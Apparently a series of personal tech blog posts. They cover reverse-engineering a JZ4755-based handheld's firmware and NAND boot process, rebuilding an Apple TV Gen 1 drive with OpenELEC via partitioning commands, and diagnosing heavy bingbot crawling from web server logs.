desktop.bin
udc_battery.bin
sysconfig.bin
toolsbox.bin
calendar.bin
ebook.bin
worldclock.bin
russblock.bin
fmradio.bin
recorder.bin
mp3_compress.bin
viewer.bin
jpgdec.bin
pngdec.bin
bmpdec.bin
gifdec.bin
AudioTag.bin <-- significant, means case sensitive vplayer.bin fplayer.bin aplayer.bin video.bin alarm.bin gameplay.bin gba_lib.bin nes_lib.bin snes_lib.bin md_lib.bin ticru_lib.bin dcDecoder.bin dvEncoder.bin dcdv.bin mpcodecs_ad_liba52.bin mpcodecs_ad_hwac3.bin ffmpeg64.bin ffmpeg_vd_mpegmisc.bin ffmpeg_vd_mpegmisc2.bin ffpmeg_vd_mpegvideo.bin mpcodecs_vs_libmpeg2.bin ffmpeg_vd_svq3.bin mpcodecs_vd_realvid.bin aux_task.bin desktoplib_simplen.bin desktoplib_drawer.bin desktoplib_slide.bin desktoplib_tradition.bin <- chinese traditional desktoplib_arena.bin desktoplib_diorama.bin

So, I know that that part is correct at least, as it really truly looks like proper data 🙂
Other things of note.

Our FAT part of the NAND, that is USB accessible is referred to internally as nfl: (Nand FLash I expect).

Looks like our loader looks for these files in the user side:

nfl:\system\music.img
nfl:\system\ebook.img
nfl:\system\desktop.img
nfl:\system\record.img
nfl:\system\system.cfg
nfl:\system\UPDATE.BIN

Filename strings are NULL terminated.

There is also this:

nfl:\GAME \gamegameList

This seems to be our mapping of game.zip -> proper name file (having taken a look at that).
Which, is why when I added FBANext compatible stuff to the user FS, it complained that it was garbage, but still worked. Lazy lazy lazy hardcoded file list, tsk tsk.

Other other observations -
I was wrong on my guess about DMENU - its actually the bog standard uCOS-II File System dialog in use.
I was wrong about FBANext being used, it looks more like FBAPlus PSP was used, and our version still has the Exit to PSP dialog still in there, as well as the menu options for the framerate etc. I guess I need to see how to bring that up, as that *is* useful!
Mine says JZ4740 1.0sp1 Nov 19 2011 in the ROM. Guess codebase for MINIOS is JZ4740 based?

Lastly, and even more useful, there apparently is a Mini console - Mini CONSOLE V1.0
I need to see how to setup access, as that looks quite interesting...

Guess I need to see if I can get the Ingenic RTOS/uCOS-II stuff, unfortunately their FTP site has it, but the RAR file is broken, so it doesn't unrar completely. This means we're missing all of the good bits that we need for reference. I can give them a call Monday though, and see if they'd be interested in helping me out.

Pretty good progress though 🙂

Good reference on this:
http://code.google.com/p/dingoo-linux/wiki/DualBoot
http://www.vogeeky.co.cc/software/minios/struktura-minios (Russian)
http://micrium.com/page/downloads/ports/mips_technologies - MiniOS Mips code. Useful more for how MINIOS does its stuff, than relevance to us.
http://forum.arcadecontrols.com/index.php?topic=108550 - The thread where I've been posting other findings on this.

Flattr this!

Continuing on from my last post.

The board I have contains the following hardware (other than the CPU)

RAM – k4s561632d-tl75 = 16M X 8BITS x 2 banks (64m ram?)
ROM – H27UBG8T2A TR = 4G Nand Flash (4G MLC? some ref as 2G, need to double check..)

NAND Config:
1024 blocks. Each block has 256 programmable pages. Each Page is 8640 bytes (8192+448spare)

Ingenic has a USBBoot.exe tool which can be used to view the NAND.
Testing was done with these nand settings in usbboot.cfg:


[PLL]
EXTCLK            24            ;Define the external crystal in MHz
CPUSPEED        336            ;Define the PLL output frequency
PHMDIV            3            ;Define the frequency divider ratio of PLL=CCLK:PCLK=HCLK=MCLK
BOUDRATE        57600            ;Define the uart baudrate. Yes they misspelt it.
USEUART            1            ;Use which uart, 0/1 for jz4740,0/1/2/3 for jz4750

[SDRAM]
;k4s561632d / : RA0 ~ RA12, Column address : CA 0 ~ CA 8
;32M x 2 chips = 64M total Ram.
BUSWIDTH        16            ;The bus width of the SDRAM in bits (16|32)
BANKS              4            ;The bank number (2|4)
ROWADDR              13            ;Row address width in bits (11-13)
COLADDR              9            ;Column address width in bits (8-12)
ISMOBILE          0            ;Define whether SDRAM is mobile SDRAM, this only valid for Jz4750 ,1:yes 0:no
ISBUSSHARE          1            ;Define whether SDRAM bus share with NAND 1:shared 0:unshared

[NAND]
BUSWIDTH         8            ;The width of the NAND flash chip in bits (8|16|32)
ROWCYCLES         3            ;The row address cycles (2|3)
PAGESIZE         8192            ;The page size of the NAND chip in bytes(512|2048|4096)
PAGEPERBLOCK        256             ;The page number per block
FORCEERASE         0            ;The force to erase flag (0|1)
OOBSIZE             448            ;oob size in byte
ECCPOS              0            ;Specify the ECC offset inside the oob data (0-[oobsize-1])
BADBLACKPOS         0            ;Specify the badblock flag offset inside the oob (0-[oobsize-1])
BADBLACKPAGE        0               ;Specify the page number of badblock flag inside a block(0-[PAGEPERBLOCK-1])
PLANENUM        2            ;The planes number of target nand flash
BCHBIT           4            ;Specify the hardware BCH algorithm for 4750 (4|8)
WPPIN             19            ;Specify the write protect pin number 
BLOCKPERCHIP        0            ;Specify the block number per chip,0 means ignore

NAND Config notes –

HYNIX_H27UBG8T2AR 3.3V 32Gbit NAND
4096M x 8bit

ID of No.0 device No.0 flash: // ad d7 94 9a 74 42
Vendor ID :0xad (Hynix) //Manufacturer Code
Product ID :0xd7 (Device ID) // Device Identifier
Chip ID :0x94 //Internal Chip Number
Page ID :0x9a //Page Size/BlockSize/Redundant Area
Plane ID :0x74 //Plane Number , ECC
Tech ID :0x42 //Tech / EDO /Interface

3.3V Bus Width x8

3rd Byte Dev ID

0x94=0b10010100

00 – Internal Chip Number 1
01 – 4 Level Cell (cell type)
01 – 2 pages programmed at once
10 – Interleave supported, Write Cache Supported

0x9a=0b10011010

10 – 8kb page size
0 10 – 448 Bytes (redundant area size)
1 01 – 2M Block Size (without spare area)

0x74=0b 0 111 01 00

01 – 2 Planes
ECC level – reserved.

0x42=0b01 000 010
010 32nm Nand
0 EDO Supported
0 SDR NAND Interface

—-

I also see this though in one of the nand.cfg files

NandID,NandExtID=PlaneNum, Tals, Talh, Trp, Twp,Trhw, Twhr, dwPageSize, dwBlockSize, dwOOBSize, dwPageAddressCycle,dwMinValidBlocks,dwMaxValidBlocks, NandName

0xADD7,0x00749A94=1, 15, 5, 15, 15, 100, 80, 8192, 2048*1024, 448, 3, 1998, 2048, “HYNIX_HY27UBG8T2ATR”}

Its referred to there as a 2G sized chip. So.. are Hynix Docs right or the above?

A look at the NAND shows:

USBBoot :> nreadraw 0 1024 0 0

00000000 ff 55 55 55 55 55 55 55 ff ff ff ff 01 00 11 04 |.UUUUUUU……..|
00000010 00 00 00 00 21 e0 e0 03 00 00 e9 8f 21 e0 20 01 |….!…….!. .|
00000020 00 80 1d 3c 00 40 bd 37 00 80 19 3c 90 06 39 27 |…<.@.7...<..9'| 00000030 08 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 |.. .............| 00000040 1b 43 02 3c 83 de 42 34 19 00 82 00 0f 00 02 3c |.C.<..B4.......<| 00000050 10 20 00 00 40 42 42 34 82 24 04 00 1b 00 44 00 |. ..@BB4.$....D.| 00000060 f4 01 80 00 50 c3 03 34 21 60 a0 00 12 48 00 00 |....P..4!`...H..| 00000070 1b 00 69 00 f4 01 20 01 12 28 00 00 02 10 25 71 |..i... ..(....%q| 00000080 01 00 a4 24 50 c3 42 38 0b 28 82 00 04 00 a3 2c |...$P.B8.(.....,| 00000090 33 00 60 10 0c 00 a2 2c 04 00 05 24 fc ff a2 24 |3.`....,...$...$| 000000a0 40 23 02 00 20 4e 02 24 1b 00 49 00 f4 01 20 01 |@#.. N.$..I... .| 000000b0 12 28 00 00 04 00 a3 2c 27 00 60 14 c0 12 05 00 |.(.....,'.`.....| 000000c0 08 00 a2 2c 2a 00 40 10 00 18 8a 34 00 5a 05 00 |...,*.@....4.Z..| …. Our JZ4755 is a MIPS XSCALE CPU. The above dump is off of a NAND, so we have a 12byte prefix (need to look at the JZ dev nand.c for a proper reason why). Allegedly in the spanish forums, its due to NAND write testing for signedness etc. If I run it through a decompiler eg mips-linux-objdump -bbinary -mmips -D ..., I do see valid code, so our initial dump looks correct for MIPS. MIPS == Backasswardness vs our dump, cough. 0: 555555ff 0x555555ff 4: 55555555 0x55555555 8: ffffffff 0xffffffff c: 04110001 bal 14 10: 00000000 nop 14: 03e0e021 move gp,ra 18: 8fe90000 lw t1,0(ra) 1c: 0120e021 move gp,t1 20: 3c1d8000 lui sp,0x8000 24: 37bd4000 ori sp,sp,0x4000 28: 3c198000 lui t9,0x8000 2c: 273906b8 addiu t9,t9,1720 30: 03200008 jr t9 34: 00000000 nop 38: 00000000 nop ... This should match up to our IPL -> SPL stuff uboot loader. Lets see, first though, an explanation.

IPL?

IPL = Initial Program Loader.
This is in CPU, and 8K in size (need to double check that in the Ingenic CPU docs), basically it boots to NAND, runs the code in NAND, unless otherwise directed via boot_sel.

Boot_Sel I hear you ask?

The JZ4755 has an integrated ROM with 8KB this memory is connected to the External Memory Controller (EMC).
After a processor reset, the processor runs the program contained in the ROM memory, and depending on the values of the boot_sel[1:0] flags carries out the following operations:

boot_sel[1:0]
00 Unused
01 Initialization via USB port: Receives a block of data through the USB (device) port,
and stores it in internal SRAM.
10 Initialization via NAND memory with 512-byte pages at Chip Select 1 (CS1):
11 Initialization via NAND memory with 2048-byte pages at Chip Select 1 (CS1):

Our CPU then reads the first byte from NAND to determine whether the bus is 8- or 16-bit.
(if bit[7:4] = 0, it is 16-bit), and the number of cycles per page is 2 or 3 (if bit[3:0] = 0, it is 2 cycles).
It then adjusts the EMC using this information and copies the first 8kB from NAND to the internal SRAM.

Our NAND has 8-bit data, 3 cyles, and 8192 bytes per page, so the first byte should be 0xFF

On our board, the boot_sel is configured by the cunningly labelled boot button.
If its pressed and we then connect a usb cable, our CPU then sits there waiting for an init via USB port.

So, we now know how the board boots up, and why our USB works.

So lets look at the actual boot code we decompiled above. Luckily I know a man with tar.gz roaming around the back streets, and persuaded him to give me some goodies. (Ok, fine, its all at the Ingenic.cn ftp site).

I’ll be even lazier though, and paste in the bits off of the Qi wiki here – http://en.qi-hardware.com/wiki/Boot_Process as its pretty much identical.

start.S

The first subroutine ran is the _start, which is defined in /cpu/mips/start.S, this subroutine makes a call to the reset function, defined on the same file, which code is shown next:

.globl _start
.text
.word JZ4740_NANDBOOT_CFG /*(0xffffffff) NAND 8 Bits 3 cycles */
b reset; nop /* U-boot entry point */
b reset; nop /* software reboot */
reset:
/*
* CU0=UM=EXL=IE=0, BEV=ERL=1, IP2~7=1 */
li t0, 0x0040FC04 /*t0 = 0x0040FC04 */
mtc0 t0, CP0_STATUS /*CP0_STAT = 0x0040FC04 Normal mode processor,
disable interrupts, Exception level normal,
kernel mode*/
/* IV=1, use the specical interrupt vector (0x200) */
li t1, 0x00800000
mtc0 t1, CP0_CAUSE /*CP0_CAUSE = 0x00800000 Cause of last exception*/

/* Init Timer */
mtc0 zero, CP0_COUNT /*Address at which processing resumes after an exception*/
mtc0 zero, CP0_COMPARE /**/

/* Initialize GOT pointer.
*/
bal 1f
nop
.word _GLOBAL_OFFSET_TABLE_
1:
move gp, ra
lw t1, 0(ra)
move gp, t1

la sp, 0x80004000
la t9, nand_boot
j t9
nop

Hmm, looks familiar doesn’t it.

If we look at hex dumps for most nand uboots for this device, you’ll find fairly similar code structures in all right at the start, albeit with slightly different header prefixes.

Next in series – dumping the NAND and converting the dumps back to binary for some reverse engineering the file system formats in use (assuming our NAND dumps are indeed correct!).

Flattr this!

One of my clients had a non-working AppleTV Gen 1 edition (the white not quite Mac Mini one).
The Hard disk had died, so we needed to get a new OS on there.

While there are plenty of write-ups about upgrading them, I couldn’t find any clear instructions on starting from scratch. The closest I found was at the OpenElec forums within their upgrade script, so I used their drive partitioning as a baseline, then worked out how to go from there.

After a few hours of trial and error last night and today, I finally got to the point where I had a working drive, and could replicate the repair process from scratch.

Without further ado, here’s my instructions:

———————-

How to create a new working Apple TV Storage device for replacing an internal drive.

You’ll need:

1) atv_restore.tar.gz – chewitt.openelec.tv/atv_restore.tar.gz
2) atv_recovery.tar.gz – chewitt.openelec.tv/atv_recovery.tar.gz
3) OpenElec files for ATV – releases.openelec.tv/OpenELEC-ATV.i386-1.95.4.tar.bz2
4) A new storage device of some kind. 4G is enough, so CF or DOM or similar is suitable.
5) Ability to follow instructions, and use common sense.
If you lack this, find someone who can assist, and who has these attributes.
No, I’m not being facetious either, the operations below are destructive, so someone with a cluestick is preferred.

Ready?

Make a temp work folder.
eg

mkdir /tmp/atv
cd /tmp/atv

Unzip the OpenElec files, and put the SYSTEM, KERNEL, and place into the work folder.
Copy the atv_restore.tar.gz to the work folder.
Copy the atv_recovery.tar.gz to the work folder.

Mount your external drive. All data will be erased on it.
*Take a note of the drive letter*

*Make sure that you have the correct drive letter*
**Double check**

Operations below are destructive, so check once more, all data will be erased on the destination drive.
In my computer, my new drive has popped up as /dev/sdf

Instructions below assume your new drive is /dev/sdf

If you are using a different drive letter, amend instructions to your drive letter.
Assuming drive is /dev/sdf in the following instructions

****Replace /dev/sdf with your drive if your drive is not using /dev/sdf*****

#Erase existing partitions/drive if not currently empty.
dd if=/dev/zero of=/dev/sdf bs=4 count=1M #Quick hacky partition / boot sector eradication, bwahahahahhem.
#Create GPT
parted -s /dev/sdf mklabel gpt
#make sure current OS knows *current* drive partition setup (i.e. no partitions, 1 gpt)
partprobe /dev/sdf

#Create EFI partition, and set bootable (35M size)
parted -s /dev/sdf mkpart primary fat32 40s 69671s
parted -s /dev/sdf set 1 boot on

#Create a “Recovery” partition (419M size)
parted -s /dev/sdf mkpart primary HFS 69672s 888871s
parted -s /dev/sdf set 2 atvrecv

#Create OS Boot partition (944MB)
parted -s /dev/sdf mkpart primary HFS 888872s 2732071s

#Create Media partition (rest of drive-262145sectors)
DISKSIZE=$(parted -s /dev/sdf unit s print | grep Disk | awk ‘{print $3}’ | sed s/s//)
let SECTORS=”${DISKSIZE}”-262145
parted -s /dev/sdf mkpart primary ext4 2732072s ${SECTORS}s

#Create SWAP partition
let SECTORS=”${SECTORS}”+1
let DISKSIZE=”${DISKSIZE}”-80
parted -s /dev/sdf mkpart primary linux-swap ${SECTORS}s ${DISKSIZE}s

#Update OS with new drive setup
partprobe /dev/sdf

#—–

#Format Partitions —-
mkfs.msdos -F 32 -n EFI /dev/sdf1 #boot
mkfs.hfsplus -v Recovery /dev/sdf2 #recovery
mkfs.hfsplus -J -v OSBoot /dev/sdf3 #Linux OS / ATV OS / OpenElec etc
mkfs.ext4 -b 4096 -L Linux /dev/sdf4 #Storage
mkswap /dev/sdf5
sync

#—
#My new _4g_ CF “HDD” looks like this:
#
#parted /dev/sdf print
#Model: TOSHIBA MK4309MAT (scsi)
#Disk /dev/sdf: 4327MB
#Sector size (logical/physical): 512B/512B
#Partition Table: gpt
#
#Number Start End Size File system Name Flags
# 1 20.5kB 35.7MB 35.7MB primary boot
# 2 35.7MB 455MB 419MB hfs+ primary atvrecv
# 3 455MB 1399MB 944MB hfs+ primary
# 4 1399MB 4193MB 2794MB ext4 primary
# 5 4193MB 4327MB 134MB linux-swap(v1) primary
#
#—

#Setup Recovery partition (sdf2) to default factory restore files.
mkdir -p /mnt/recovery
fsck.hfsplus -f /dev/sdf2
mount -t hfsplus -o rw,force /dev/sdf2 /mnt/recovery
tar -xzvf atv_restore.tar.gz -C /mnt/recovery
chown -R root:root /mnt/recovery

#Copy OpenElec files to OSBoot Linux partition (sdf3) SYSTEM, LINUX ——–
mkdir -p /mnt/linux
fsck.hfsplus -f /dev/sdf3
mount -t hfsplus -o rw,force /dev/sdf3 /mnt/linux
cp KERNEL /mnt/linux
cp SYSTEM /mnt/linux
umount /dev/sdf3

#Redo recovery partition (sdf2) to patchstick defaults now. —–
#Copy over recovery.tar.gz files
#update keyword -> bootable
#rename boot script to patchstick.sh
#make executable and own all files as root
tar -xzvf atv_recovery.tar.gz -C /mnt/recovery
echo bootable > /mnt/recovery/keyword
rm /mnt/recovery/patchstick.sh
mv /mnt/recovery/patchstick.boot /mnt/recovery/patchstick.sh

#Make sure to edit fsck.ext4 /dev/sdf3 to fsck.hfsplus /dev/sdf3 in default patchstick.sh as this may break our HFSplus partition if we fsck.ext4 it…

chmod 7777 /mnt/recovery/patchstick.sh
chown -R root.root /mnt/recovery
umount /dev/sdf2

#Setup media partition (/dev/sdf4) ——
mkdir -p /mnt/media
mount /dev/sdf4 /mnt/media
mkdir -p /mnt/media/.config
touch /mnt/media/.config/ssh_enable #I like SSH access as a default.
mkdir -p /mnt/media/.cache
mkdir -p /mnt/media/.xbmc/userdata
umount /dev/sdf4

#Prepare for takeoff, er eject drive.
sync
eject /dev/sdf

—–
This drive can now be mounted in the ATV1, and will boot into OpenElec (after a 1st reboot fsck)

=============
#Amended Boot script for reference ( patchstick.sh )

fsck.hfsplus /dev/sdf3 &> /dev/null
fsck.ext4 /dev/sdf4 &> /dev/null
mkdir /boot
mount /dev/sdf3 /boot
kexec -l /boot/KERNEL –command-line=”boot=/dev/sdf3 disk=/dev/sdf4 quiet nosplash”
kexec -e

Flattr this!

One of our colo clients was complaining that his site was slow.

Took a look, and although load was only slightly above normal, he was doing a substantial amount of traffic throughput.

As he has multiple *busy* sites on his server, it was easier to take a look at iftop to see what was leeching the most traffic.

I could immediately see that he had a couple of spiders indexing one of his sites.
Normally this isn’t a huge issue, as they usually place nicely.

In this case, it seemed to be multiple connections from spiders.
Our robots.txt looked something like this –

cat robots.txt

User-agent: *
Disallow: /members/
Disallow: /activity/
Disallow: /ko/
Disallow: /fr/
Disallow: /zh/
Disallow: /th/
Disallow: /vi/
Disallow: /th/
Disallow: /es/
Disallow: /ja/
Disallow: /it/
Disallow: /ru/
Disallow: /ar/
Disallow: /fi/
Disallow: /pl/
Disallow: /nl/
Disallow: /pt/
Disallow: /he/
Disallow: /no/
Disallow: /sv/
Disallow: /zh-tw/
Disallow: /cs/
Disallow: /de/
Disallow: /uk/
Disallow: /el/
Disallow: /tr/

A quick check of site logs filtered by spiders showed that the majority of the traffic was coming from Bing / MSN.

There were at least 10 – 15 simultaneous spiders indexing. Not only that, but Bing / MSN was busy indexing all the lovely pages that we’d explicitly excluded in the sites robots.txt file.

*and* it was downloading the robots.txt file, then totally ignoring it.

207.46.195.241 - - [18/May/2012:03:15:04 +0000] "GET /robots.txt HTTP/1.1" 404 280 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.195.241 - - [18/May/2012:03:15:57 +0000] "GET / HTTP/1.1" 500 975 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.195.241 - - [18/May/2012:03:17:29 +0000] "GET / HTTP/1.0" 500 1534 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.195.241 - - [18/May/2012:04:17:30 +0000] "GET / HTTP/1.0" 500 1534 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.195.234 - - [18/May/2012:12:57:16 +0000] "GET /no/members/kxtjanio/activity/ HTTP/1.1" 200 14555 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.17.196 - - [18/May/2012:12:57:16 +0000] "GET /tr/members/poluden/activity/groups/?acpage=14 HTTP/1.1" 200 17927 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.17.196 - - [18/May/2012:12:57:16 +0000] "GET /zh-tw/members/bluezat/forums/ HTTP/1.1" 200 14633 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.17.196 - - [18/May/2012:12:57:18 +0000] "GET /ar/members/filozofem/activity/1643 HTTP/1.1" 200 12348 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.17.196 - - [18/May/2012:12:57:18 +0000] "GET /pt/members/chwacker/activity/groups/ HTTP/1.1" 200 18675 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.17.196 - - [18/May/2012:12:57:20 +0000] "GET /ru/members/maklare/points/points/ HTTP/1.1" 200 14945 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.17.196 - - [18/May/2012:12:57:21 +0000] "GET /pl/members/ken0115/activity/groups/?acpage=7 HTTP/1.1" 200 17936 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.17.196 - - [18/May/2012:12:57:21 +0000] "GET /zh/members/halilfree82/activity/favorites/ HTTP/1.1" 200 15677 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.17.196 - - [18/May/2012:12:57:23 +0000] "GET /zh/members/elwe/activity/mentions/ HTTP/1.1" 200 15670 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.17.196 - - [18/May/2012:12:57:23 +0000] "GET /no/members/afsaneh/activity/friends/?acpage=5 HTTP/1.1" 200 17101 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.17.196 - - [18/May/2012:12:57:25 +0000] "GET /tr/members/ahuy/activity/friends/ HTTP/1.1" 200 17458 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.17.196 - - [18/May/2012:12:57:25 +0000] "GET /members/zarus/activity/groups/?acpage=3 HTTP/1.1" 200 18131 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.17.196 - - [18/May/2012:12:57:26 +0000] "GET /ko/members/daniel/activity/friends/?acpage=4 HTTP/1.1" 200 18598 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.108.69 - - [18/May/2012:12:57:30 +0000] "GET /fr/members/poluden/activity/ HTTP/1.1" 200 15480 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.17.151 - - [18/May/2012:12:57:31 +0000] "GET /fr/activity/?acpage=14 HTTP/1.1" 200 17299 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.17.151 - - [18/May/2012:12:57:31 +0000] "GET /zh/members/zarus/activity/groups/blog.letsfx.com?acpage=1 HTTP/1.1" 200 19401 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.17.151 - - [18/May/2012:12:57:33 +0000] "GET /th/members/chwacker/activity/friends/?acpage=2 HTTP/1.1" 200 16651 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.110.198 - - [18/May/2012:12:57:34 +0000] "GET /vi/members/natvp/activity/groups/?acpage=5 HTTP/1.1" 200 20382 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.110.198 - - [18/May/2012:12:57:34 +0000] "GET /th/members/helen/activity/groups/?acpage=3 HTTP/1.1" 200 18099 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.109.200 - - [18/May/2012:12:57:35 +0000] "GET /groups/bep-study-buddies/activity/2971/ HTTP/1.1" 200 13887 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.109.200 - - [18/May/2012:12:57:35 +0000] "GET /ko/members/ahmedv/blogs/ HTTP/1.1" 200 15091 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.109.200 - - [18/May/2012:12:57:42 +0000] "GET /fr/members/cluadiomasu/points/ HTTP/1.1" 200 14172 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.109.200 - - [18/May/2012:12:57:42 +0000] "GET /ja/members/shengmao8620/groups/ HTTP/1.1" 200 15219 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.109.200 - - [18/May/2012:12:57:45 +0000] "GET /es/blog/tag/presentations-2/ HTTP/1.1" 200 17037 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.109.200 - - [18/May/2012:12:57:45 +0000] "GET /it/members/phuong.vo/activity/groups/ HTTP/1.1" 200 18216 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.109.200 - - [18/May/2012:12:57:48 +0000] "GET /fi/members/stella85/activity/1086 HTTP/1.1" 200 12350 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.109.200 - - [18/May/2012:12:57:48 +0000] "GET /ru/members/stella85/activity/groups/?acpage=12 HTTP/1.1" 200 21159 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.109.200 - - [18/May/2012:12:57:49 +0000] "GET /zh/members/kris/activity/friends/ HTTP/1.1" 200 18838 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.109.200 - - [18/May/2012:12:57:50 +0000] "GET /fr/members/cheryl/activity/groups/?acpage=14 HTTP/1.1" 200 19312 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.109.200 - - [18/May/2012:12:57:51 +0000] "GET /vi/members/vecttra/activity/groups/?acpage=4 HTTP/1.1" 200 17180 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.109.200 - - [18/May/2012:12:57:53 +0000] "GET /fi/members/?s=Intermediate&upage=1 HTTP/1.1" 200 13955 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.109.200 - - [18/May/2012:12:57:53 +0000] "GET /ar/members/test-user/activity/groups/?acpage=9 HTTP/1.1" 200 17499 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.17.151 - - [18/May/2012:12:57:53 +0000] "GET /members/admin/friends HTTP/1.1" 200 14760 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.17.151 - - [18/May/2012:12:57:53 +0000] "GET /members/lasso/activity/groups/?acpage=3 HTTP/1.1" 200 18101 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.51 - - [18/May/2012:12:57:58 +0000] "GET /fi/members/hoangdtv7986/friends HTTP/1.1" 200 13741 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.110.17 - - [18/May/2012:12:58:01 +0000] "GET /ru/members/nikoletth/points/ HTTP/1.1" 200 14970 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.17.151 - - [18/May/2012:12:58:01 +0000] "GET /ko/members/muratoncel3438/activity/ HTTP/1.1" 200 16100 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.17.151 - - [18/May/2012:12:58:01 +0000] "GET /fr/members/jack/activity/ HTTP/1.1" 200 15425 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.17.151 - - [18/May/2012:12:58:03 +0000] "GET /pl/members/filozofem/blogs/ HTTP/1.1" 200 13573 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.17.151 - - [18/May/2012:12:58:08 +0000] "GET /nl/members/mohamedyahia/activity/friends/?acpage=10 HTTP/1.1" 200 17835 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.17.151 - - [18/May/2012:12:58:08 +0000] "GET /pt/members/augert/activity/favorites/ HTTP/1.1" 200 15187 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.17.151 - - [18/May/2012:12:58:10 +0000] "GET /ko/members/chima78/activity/favorites/ HTTP/1.1" 200 15851 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.17.151 - - [18/May/2012:12:58:14 +0000] "GET /he/members/wildthing/activity/friends/ HTTP/1.1" 200 16883 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.51 - - [18/May/2012:12:58:21 +0000] "GET /no/members/filiz/activity/friends/?acpage=7 HTTP/1.1" 200 16440 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.108.69 - - [18/May/2012:12:58:30 +0000] "GET /members/david/activity/groups/?acpage=8 HTTP/1.1" 200 17208 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.51 - - [18/May/2012:12:58:30 +0000] "GET /pt/members/moniques/activity/groups/?acpage=7 HTTP/1.1" 200 18934 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.110.17 - - [18/May/2012:12:58:31 +0000] "GET /sv/groups/bep-study-buddies/members/?mlpage=7 HTTP/1.1" 200 14784 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.108.69 - - [18/May/2012:12:58:30 +0000] "GET /zh-tw/members/marcos/activity/friends/?acpage=2 HTTP/1.1" 200 18219 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
